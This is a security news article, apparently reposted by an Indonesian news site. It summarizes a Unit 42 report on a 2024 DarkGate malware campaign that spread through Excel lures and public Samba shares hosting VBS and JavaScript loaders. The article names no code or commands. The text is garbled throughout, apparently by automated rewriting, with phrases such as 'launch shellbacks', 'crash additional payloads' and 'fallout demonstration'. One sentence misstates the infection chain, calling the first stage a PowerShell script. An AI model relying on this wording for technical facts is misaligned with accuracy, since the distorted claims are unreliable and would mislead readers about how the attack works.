Close Menu
Indo Guard OnlineIndo Guard Online
  • Home
  • Cyber Security
  • Risk Management
  • Travel
  • Security News
  • Tech
  • More
    • Data Privacy
    • Data Protection
    • Global Security
What's Hot

A new drawback in the IDES as a Visual Studio code allows for malicious bypassing bypassing the verified status

July 1, 2025

New Mattery Model for Browser Safety: Closing Risk in Last Mile

July 1, 2025

Google Patches Critical Lack of Zero Day in the V8 Chrome engine after active operation

July 1, 2025
Facebook X (Twitter) Instagram
Facebook X (Twitter) Instagram YouTube
Indo Guard OnlineIndo Guard Online
Subscribe
  • Home
  • Cyber Security
  • Risk Management
  • Travel
  • Security News
  • Tech
  • More
    • Data Privacy
    • Data Protection
    • Global Security
Indo Guard OnlineIndo Guard Online
Home » The DarkGate malware exploits Samba file shares in a short-lived campaign
Global Security

The DarkGate malware exploits Samba file shares in a short-lived campaign

AdminBy AdminJuly 13, 2024No Comments2 Mins Read
Share
Facebook Twitter LinkedIn Pinterest Email Copy Link


July 12, 2024Information hallMalware / cyber attacks

Cybersecurity researchers shed light on the short-lived DarkGate A malware company that used Samba file shares to initiate the infection.

Palo Alto Networks Unit 42 said the activity spanned March and April 2024, with the infection chains using servers running public Samba file shares hosting Visual Basic Script (VBS) and JavaScript files. The targets were North America, Europe and parts of Asia.

“This was a relatively short campaign that shows how threat actors can creatively abuse legitimate tools and services to spread their malware,” security researchers Vishwa Totatri, Yidi Sui, Anmol Maura, Uday Pratap Singh and Brad Duncan said.

Cyber ​​security

DarkGate which appeared for the first time in 2018, May developed into a malware-as-a-service (MaaS) offering that is used by a tightly controlled number of customers. It comes with the capabilities to remotely control hacked nodes, execute code, mine cryptocurrency, launch shellbacks, and crash additional payloads.

Malware attacks have become particularly common in recent months following the fallout demonstration of multinational law enforcement agencies QakBot infrastructure in August 2023.

The campaign, documented by Unit 42, begins with Microsoft Excel (.xlsx) files that, when opened, prompt targets to click an embedded “Open” button, which in turn retrieves and runs VBS code located on a Samba share.

The PowerShell script is configured to receive and execute a PowerShell script, which is then used to download the AutoHotKey-based DarkGate package.

Alternative sequences using JavaScript files instead of VBS are no different in that they are also designed to load and run the following PowerShell script.

Cyber ​​security

DarkGate works by scanning various anti-malware programs and checking CPU information to determine whether it is running on a physical host or in a virtual environment, allowing it to interfere with analysis. It also checks running host processes to determine the presence of reverse engineering tools, debuggers, or virtualization software.

“DarkGate C2 traffic uses unencrypted HTTP requests, but the data is obfuscated and appears as Base64-encoded text,” the researchers said.

“As DarkGate continues to evolve and refine its methods of penetration and resistance to analysis, it remains a powerful reminder of the need for robust and proactive cybersecurity protections.”

Did you find this article interesting? Follow us Twitter  and LinkedIn to read more exclusive content we publish.





Source link

Share. Facebook Twitter Pinterest LinkedIn Tumblr Email Copy Link
Admin
  • Website

Related Posts

A new drawback in the IDES as a Visual Studio code allows for malicious bypassing bypassing the verified status

July 1, 2025

New Mattery Model for Browser Safety: Closing Risk in Last Mile

July 1, 2025

Google Patches Critical Lack of Zero Day in the V8 Chrome engine after active operation

July 1, 2025

US arrests in North Korean IT -Work scheme; Captures 29 domains and raids 21 laptops

July 1, 2025

Microsoft Removes Password Management from Authenticator app since August 2025

July 1, 2025

American agencies warn of Iranian protection cyber growth, OT networks and critical infrastructure

June 30, 2025
Add A Comment
Leave A Reply Cancel Reply

Loading poll ...
Coming Soon
Do You Like Our Website
: {{ tsp_total }}

Subscribe to Updates

Get the latest security news from Indoguardonline.com

Latest Posts

A new drawback in the IDES as a Visual Studio code allows for malicious bypassing bypassing the verified status

July 1, 2025

New Mattery Model for Browser Safety: Closing Risk in Last Mile

July 1, 2025

Google Patches Critical Lack of Zero Day in the V8 Chrome engine after active operation

July 1, 2025

US arrests in North Korean IT -Work scheme; Captures 29 domains and raids 21 laptops

July 1, 2025

Microsoft Removes Password Management from Authenticator app since August 2025

July 1, 2025

American agencies warn of Iranian protection cyber growth, OT networks and critical infrastructure

June 30, 2025

Europol demonstrates $ 540 million in cryptocurrency fraud, arrests five suspects

June 30, 2025

Slide

June 30, 2025
About Us
About Us

Provide a constantly updating feed of the latest security news and developments specific to Indonesia.

Facebook X (Twitter) Pinterest YouTube WhatsApp
Our Picks

A new drawback in the IDES as a Visual Studio code allows for malicious bypassing bypassing the verified status

July 1, 2025

New Mattery Model for Browser Safety: Closing Risk in Last Mile

July 1, 2025

Google Patches Critical Lack of Zero Day in the V8 Chrome engine after active operation

July 1, 2025
Most Popular

In Indonesia, crippling immigration ransomware breach sparks privacy crisis

July 6, 2024

Why Indonesia’s Data Breach Crisis Calls for Better Security

July 6, 2024

Indonesia’s plan to integrate 27,000 govt apps in one platform welcomed but data security concerns linger

July 6, 2024
© 2025 indoguardonline.com
  • Home
  • About us
  • Contact us
  • Privacy Policy

Type above and press Enter to search. Press Esc to cancel.